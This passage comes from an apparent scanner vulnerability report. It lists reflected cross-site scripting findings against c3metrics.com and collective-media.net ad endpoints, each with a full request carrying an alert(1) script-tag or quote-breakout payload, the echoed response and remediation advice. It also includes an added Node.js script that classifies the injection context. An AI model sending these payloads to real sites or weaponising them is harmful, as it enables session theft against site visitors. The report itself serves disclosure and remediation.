Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:04 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:39:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-39-04_17462808071304955544; expires=Sat, 07-May-2016 15:39:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_17462808071304955544; expires=Mon, 09-May-2011 15:54:04 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
72191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='17462808071304955544';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='83150<script>alert(1)</script>ef603f8fccd';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

2.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

Summary

Severity: High
Confidence: Certain
Host: http://480-adver-view.c3metrics.com
Path: /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied unmodified into the single-quoted JavaScript string literal assigned to c3VJStv. The payload 4a309<script>alert(1)</script>ebde3e6b103 was submitted appended to the legitimate value (t=724a309<script>...) and echoed unmodified in the response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The body is JavaScript served as text/html, so a browser that navigates to the URL directly parses it as HTML and executes the injected <script> element. In legitimate traffic t is numeric (t=72), so rejecting anything but digits before echoing the value would have been sufficient here.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=724a309<script>alert(1)</script>ebde3e6b103&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:04 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Wed, 08-Jun-2011 19:39:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-39-04_8048716101304955544; expires=Sat, 07-May-2016 15:39:04 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_8048716101304955544; expires=Mon, 09-May-2011 15:54:04 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='8048716101304955544';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='724a309<script>alert(1)</script>ebde3e6b103';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

2.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

Summary

Severity: High
Confidence: Certain
Host: http://480-adver-view.c3metrics.com
Path: /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied unmodified into the single-quoted JavaScript string literal assigned to c3VJSrvSet (not c3VJSuidSet; compare finding 2.4, where rv lands in c3VJSuidSet). The payload 850d8<script>alert(1)</script>2b3d55e9cdd was submitted in the uid parameter and echoed unmodified in the response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The body is JavaScript served as text/html, so a browser that navigates to the URL directly parses it as HTML and executes the injected <script> element.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=850d8<script>alert(1)</script>2b3d55e9cdd&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:39:05 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-39-05_13016313581304955545; expires=Sat, 07-May-2016 15:39:05 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_13016313581304955545; expires=Mon, 09-May-2011 15:54:05 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='13016313581304955545';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='850d8<script>alert(1)</script>2b3d55e9cdd';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

Summary

Severity: High
Confidence: Certain
Host: http://480-adver-view.c3metrics.com
Path: /v.js

Issue detail

The value of the cid request parameter is copied unmodified into the double-quoted JavaScript string b, which v.js then uses to build the src of a second script element (e.src='http://480-adver-view.c3metrics.com/'+b) pointing at c3VTabstrct-6-2.php; the tainted value therefore also reaches the endpoint of findings 2.1 to 2.6, which reflects it again. The payload 745f6<script>alert(1)</script>fac915db6fb was submitted appended to the legitimate value (cid=480745f6<script>...) and echoed unmodified in the response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. As with c3VTabstrct-6-2.php, the body is JavaScript served as text/html, so a browser that navigates to the URL directly parses it as HTML and executes the injected <script> element.

Request

GET /v.js?id=adver&cid=480745f6<script>alert(1)</script>fac915db6fb&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:56 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480745f6<script>alert(1)</script>fac915db6fb&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

2.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

Summary

Severity: High
Confidence: Certain
Host: http://480-adver-view.c3metrics.com
Path: /v.js

Issue detail

The value of the id request parameter is copied unmodified into the double-quoted JavaScript string b that v.js turns into the src of a second script element loading c3VTabstrct-6-2.php, so the value is reflected here and forwarded to that endpoint as well. The payload c9a94<script>alert(1)</script>2de1484b29c was submitted appended to the legitimate value (id=adverc9a94<script>...) and echoed unmodified in the response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The body is JavaScript served as text/html, so a browser that navigates to the URL directly parses it as HTML and executes the injected <script> element.

Request

GET /v.js?id=adverc9a94<script>alert(1)</script>2de1484b29c&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:56 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adverc9a94<script>alert(1)</script>2de1484b29c&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

2.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

Summary

Severity: High
Confidence: Certain
Host: http://480-adver-view.c3metrics.com
Path: /v.js

Issue detail

The value of the t request parameter is copied unmodified into the double-quoted JavaScript string b that v.js turns into the src of a second script element loading c3VTabstrct-6-2.php. The payload 8057d<script>alert(1)</script>fa805584b51 was submitted appended to the legitimate value (t=728057d<script>...) and echoed unmodified in the response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The body is JavaScript served as text/html, so a browser that navigates to the URL directly parses it as HTML and executes the injected <script> element; inside the intended script-include context the payload sits in a double-quoted string and would need a double quote to break out.

Request

GET /v.js?id=adver&cid=480&t=728057d<script>alert(1)</script>fa805584b51 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:56 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=728057d<script>alert(1)</script>fa805584b51&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...
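
The issue details above describe every c3metrics reflection as text between tags, which is what an HTML parser sees, while the responses are really JavaScript served with the wrong Content-Type. The following Node.js script is an added example, not code from the report, from XSS.CX or from c3metrics.com. It takes the response snippets of findings 2.5 and 2.9 (transcribed into the script as captures), finds the canary, determines the enclosing JavaScript string context with a small quote-tracking scanner, and combines that with the Content-Type to state which vector the payload actually has. The third capture, the 2.9 body with Content-Type application/x-javascript, is a constructed contrast showing that correcting the header alone closes the direct-navigation vector for a <script> payload but would do nothing against a quote breakout. The function names jsStringContextAt, triage and triageAll are this example's own.

```javascript
// Added example (not code from the report, from XSS.CX or from c3metrics.com).
// Locate the scanner canary in a captured response, work out which JavaScript
// string literal (if any) encloses it, and combine that with the Content-Type:
// a text/html body runs an injected <script> element on direct navigation no
// matter what JS surrounds it, while a body loaded via <script src> only runs a
// payload that closes its enclosing string literal.

// Transcribed from the response snippets of findings 2.5 and 2.9 above. The third
// entry is the 2.9 body with a corrected Content-Type: a constructed contrast, not
// a response the scanner saw.
const CAPTURES = [
  {
    finding: '2.5 c3VTabstrct-6-2.php [t]',
    contentType: 'text/html',
    canary: '724a309<script>alert(1)</script>ebde3e6b103',
    body:
      "this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';" +
      "this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='8048716101304955544';" +
      "this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='724a309<script>alert(1)</script>ebde3e6b103';" +
      "this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';",
  },
  {
    finding: '2.9 v.js [t]',
    contentType: 'text/html',
    canary: '8057d<script>alert(1)</script>fa805584b51',
    body:
      "if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0," +
      "c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};" +
      "window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){" +
      "this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';" +
      "var b=c3VTconstVal.c3VJSconst.c3VTJSurl+\"?id=adver&cid=480&t=728057d<script>alert(1)</script>fa805584b51&rv=&uid=&td=\";",
  },
];
CAPTURES.push({
  ...CAPTURES[1],
  finding: '2.9 v.js [t], same body served as application/x-javascript (constructed)',
  contentType: 'application/x-javascript',
});

const CLOSER = { single: "'", double: '"', template: '`' };

// Scan JavaScript source up to `offset` and report the string-literal state there.
// Heuristic: tracks ', ", ` and backslash escapes; comments and regex literals are
// not modelled, which is enough for minified ad-tag output like the bodies above.
function jsStringContextAt(src, offset) {
  let ctx = 'none';
  for (let i = 0; i < offset; i++) {
    const c = src[i];
    if (ctx === 'none') {
      if (c === "'") ctx = 'single';
      else if (c === '"') ctx = 'double';
      else if (c === '`') ctx = 'template';
    } else if (c === '\\') {
      i++; // skip the escaped character
    } else if (c === CLOSER[ctx]) {
      ctx = 'none';
    }
  }
  return ctx;
}

function triage({ finding, contentType, canary, body }) {
  const at = body.indexOf(canary);
  if (at < 0) return { finding, reflected: false };
  const context = jsStringContextAt(body, at);
  const mime = contentType.split(';')[0].trim().toLowerCase();
  const closer = CLOSER[context];
  return {
    finding,
    reflected: true,
    context,
    // HTML parser on direct navigation: the JS around the canary is just text.
    runsOnNavigation: mime === 'text/html' && /<script[\s>]/i.test(canary),
    // Loaded as a script: only a payload that closes the literal can execute.
    runsAsScript: closer !== undefined && canary.includes(closer),
  };
}

function triageAll(captures = CAPTURES) {
  return captures.map(triage);
}

for (const r of triageAll()) console.log(r);
```

Running it reports 2.5 as a single-quoted context and 2.9 as a double-quoted one, both executable on direct navigation only because of the text/html header, and the constructed contrast as reflected but inert in both vectors. A response served as application/x-javascript that echoes a quote-breakout canary such as the one in finding 2.10 comes out the other way round: inert on navigation, executable wherever a page includes it as a script.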

2.10. http://a.collective-media.net/adj/cm.rub_usatoday/ [REST URL parameter 2]

Summary

Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/cm.rub_usatoday/

Issue detail

The second path segment (the site code, cm.rub_usatoday) is copied unmodified into the single-quoted string passed to document.write, which builds the src of a second script tag on k.collective-media.net. The payload 19712'-alert(1)-'edff4653ce4 was submitted in that segment; its first single quote closes the string literal, and the rest parses as a subtraction expression, so alert(1) runs as soon as the response is executed.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the response is served as application/x-javascript, it does not execute on direct navigation; it executes in the context of whatever page includes it with a <script src> tag, which is how this ad tag is normally deployed. Loaded from an attacker's own page it gains nothing, so the impact arises where a publisher page builds this URL from data the attacker can influence.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be echoed, validate it against an allow-list (site codes have a fixed character set) and emit it as a properly escaped JavaScript string literal rather than concatenating it into the document.write argument.

Request

GET /adj/cm.rub_usatoday19712'-alert(1)-'edff4653ce4/;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:03 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 15:37:03 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rub_usatoday19712'-alert(1)-'edff4653ce4/;sz=728x90;net=cm;ord=[timestamp];'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.11. http://a.collective-media.net/adj/cm.rub_usatoday/ [name of an arbitrarily supplied request parameter]

Summary

Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/cm.rub_usatoday/

Issue detail

The query string of the request, including the name of an arbitrarily supplied parameter, is copied unmodified into the single-quoted string passed to document.write that builds the src of the k.collective-media.net script tag. The payload be6a4'-alert(1)-'d35b3f2842c was submitted as a parameter name (&be6a4'-alert(1)-'d35b3f2842c=1) and echoed unmodified in the response, where its single quote closes the string literal.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The response is served as application/x-javascript, so it executes only when a page includes it as a script, not on direct navigation.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The query string should not be forwarded into the script URL at all; only known, validated fields should be emitted, as escaped JavaScript string literals.

Request

GET /adj/cm.rub_usatoday/;sz=728x90;ord=[timestamp]?&be6a4'-alert(1)-'d35b3f2842c=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 09 May 2011 15:37:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 15:37:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rub_usatoday/;sz=728x90;net=cm;ord=[timestamp]?&be6a4'-alert(1)-'d35b3f2842c=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.12. http://a.collective-media.net/adj/cm.rub_usatoday/ [sz parameter]

Summary

Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/cm.rub_usatoday/

Issue detail

The scanner attributes this reflection to the sz parameter, but the recorded request leaves sz=728x90 intact and appends the payload 2af5b'-alert(1)-'737101c3cfa as the query string after the ?. The server rebuilds the request URL, query string included, into the single-quoted string passed to document.write, so the payload is echoed unmodified and its single quote closes the string literal.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. As in findings 2.10 and 2.11, the application/x-javascript response executes only when a page includes it as a script.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The size should be validated against a pattern such as digits x digits before use, and the request query string should not be copied into the generated script URL.

Request

GET /adj/cm.rub_usatoday/;sz=728x90;ord=[timestamp]?2af5b'-alert(1)-'737101c3cfa HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
